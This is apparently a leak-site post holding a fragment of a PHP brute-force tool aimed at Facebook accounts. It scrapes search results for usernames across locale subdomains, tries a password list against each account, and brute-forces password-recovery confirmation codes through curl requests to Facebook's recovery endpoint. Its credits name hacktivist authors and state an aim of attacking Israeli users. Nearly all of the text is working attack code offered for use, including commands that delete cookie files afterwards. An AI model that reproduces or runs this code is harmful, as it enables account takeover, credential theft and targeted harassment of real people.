PHP Facebook Password Bruteforce Script With Video ★ReskayLeaks★
Not the right one :( || Username : $user Password : $pass
"; }else{ echo "This Password Seems Working !Try It ^_^ || Username: $user Password : $pass
"; } } if(isset($_POST['start'])){ letItBy(); for($googlePage = 1; $googlePage <= 50; $googlePage++) { $googleResult = google_that($bing, $googlePage); if(!$googleResult) { echo 'Finished scanning.'; break; } // Gets the username of victim for($victim = 0; $victim < sizeof($googleResult); $victim++){ $result = $googleResult[$victim]['unescapedUrl']; if($country == "site:fr-fr.facebook.com/"){ $rsss = str_replace("https://fr-fr.facebook.com/","",$result); } elseif($country == "site:ar-ar.facebook.com/"){ $rsss = str_replace("https://ar-ar.facebook.com/","",$result); } elseif($country == "site:es-es.facebook.com/"){ $rsss = str_replace("https://es-es.facebook.com/","",$result); } elseif($country == "site:tr-tr.facebook.com/"){ $rsss = str_replace("https://tr-tr.facebook.com/","",$result); } elseif($country == "site:de-de.facebook.com/"){ $rsss = str_replace("https://de-de.facebook.com/","",$result); } elseif($country == "site:pt-pt.facebook.com/"){ $rsss = str_replace("https://pt-pt.facebook.com/","",$result); } elseif($country == "site:it-it.facebook.com/"){ $rsss = str_replace("https://it-it.facebook.com/","",$result); } elseif($country == "site:hi-in.facebook.com/"){ $rsss = str_replace("https://hi-in.facebook.com/","",$result); } elseif($country == "site:zh-cn.facebook.com/"){ $rsss = str_replace("https://zh-cn.facebook.com/","",$result); } elseif($country == "site:sr-rs.facebook.com/"){ $rsss = str_replace("https://sr-rs.facebook.com/","",$result); } elseif($country == "site:el-gr.facebook.com/"){ $rsss = str_replace("https://el-gr.facebook.com/","",$result); } elseif($country == "site:he-il.facebook.com/"){ $rsss = str_replace("https://he-il.facebook.com/","",$result); } elseif($country == "site:id-id.facebook.com/"){ $rsss = str_replace("https://id-id.facebook.com/","",$result); } elseif($country == "site:ru-ru.facebook.com/"){ $rsss = str_replace("https://ru-ru.facebook.com/","",$result); } elseif($country == "site:nl-nl.facebook.com/"){ $rsss = str_replace("https://nl-nl.facebook.com/","",$result); } elseif($country == "site:bg-bg.facebook.com/"){ $rsss = str_replace("https://bg-bg.facebook.com/","",$result); } elseif($country == "site:mk-mk.facebook.com/"){ $rsss = str_replace("https://mk-mk.facebook.com/","",$result); } elseif($country == "site:uk-ua.facebook.com/"){ $rsss = str_replace("https://uk-ua.facebook.com/","",$result); } $users = explode("?", $rsss); $users = $users[0]; //Bruteforce Function foreach($password as $pass) { echo brute($users,$pass); } } } } @system("del cookie.txt"); //Delete cookies command for win server. @system("rm cookie.txt"); // Delete cookies command for linux server. } if(isset($_GET['action']) && $_GET['action'] == 'baipas'){ ob_start(); @set_time_limit(0); ################################################# #---------------------------------------------- # # Facebook Brute Force 2014 # #Coded by : Mauritania Attacker&Noname-Haxor # #Greetz : All AnonGhost Members # #This Tool Is For Erasing Israel in Fb # # --------------------------------------------- # ################################################# echo " "; $target=$_POST['target']; $user = explode("\r\n", $_POST['code']); if($_POST['scan']) { foreach($user as $code) { // Curl Function ^_^ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$target}&n={$code}"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); // change this with your real useragent infos (browser & version) $check = curl_exec($ch); if(eregi("password_new", $check)) //Keyword Good Response ^_^ { echo "{$code} => Facebook Confirmation Code Found ^_^